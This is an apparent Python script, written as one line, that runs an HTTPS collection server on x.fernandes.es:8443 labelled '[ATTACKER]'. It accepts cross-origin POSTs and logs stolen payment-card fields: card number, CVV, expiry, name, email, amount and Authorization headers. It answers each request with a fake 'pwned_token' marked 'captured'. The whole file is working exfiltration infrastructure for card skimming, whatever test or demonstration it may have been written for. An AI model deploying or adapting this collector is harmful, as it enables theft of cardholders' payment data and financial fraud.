import http.server, ssl, json, datetime, sys class Handler(http.server.BaseHTTPRequestHandler): def do_OPTIONS(self): self.send_response(200) for h,v in [('Access-Control-Allow-Origin','*'), ('Access-Control-Allow-Methods','POST,GET,OPTIONS'), ('Access-Control-Allow-Headers','*')]: self.send_header(h,v) self.end_headers() def do_POST(self): length = int(self.headers.get('Content-Length',0)) body = self.rfile.read(length) ts = datetime.datetime.now().strftime('%H:%M:%S') print(f'\n{"="*65}', flush=True) print(f'[{ts}] *** DATOS DE TARJETA RECIBIDOS EN x.fernandes.es:8443 ***', flush=True) print(f' PATH : {self.path}', flush=True) print(f' Auth : {self.headers.get("Authorization","")}', flush=True) try: parsed = json.loads(body) pd = parsed.get('payment_details',{}) print(f' PAN : {pd.get("number","")}', flush=True) print(f' CVV : {pd.get("verification_value","")}', flush=True) print(f' EXP : {pd.get("month","")}/{pd.get("year","")}', flush=True) print(f' NAME : {pd.get("name","")}', flush=True) print(f' EMAIL: {pd.get("email","")}', flush=True) print(f' AMT : {parsed.get("amount","")} {parsed.get("currency","")}', flush=True) print(f' FULL : {json.dumps(parsed, indent=2)}', flush=True) except: print(f' RAW : {body.decode("utf-8","replace")}', flush=True) print(f'{"="*65}', flush=True) sys.stdout.flush() self.send_response(200) self.send_header('Content-Type','application/json') self.send_header('Access-Control-Allow-Origin','*') self.end_headers() self.wfile.write(b'{"id":"pwned_token","status":"captured"}') def log_message(self,*a): pass ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER) ctx.load_cert_chain('/etc/letsencrypt/live/x.fernandes.es/fullchain.pem', '/etc/letsencrypt/live/x.fernandes.es/privkey.pem') srv = http.server.HTTPServer(('0.0.0.0', 8443), Handler) srv.socket = ctx.wrap_socket(srv.socket, server_side=True) print('[ATTACKER] https://x.fernandes.es:8443 listo', flush=True) srv.serve_forever()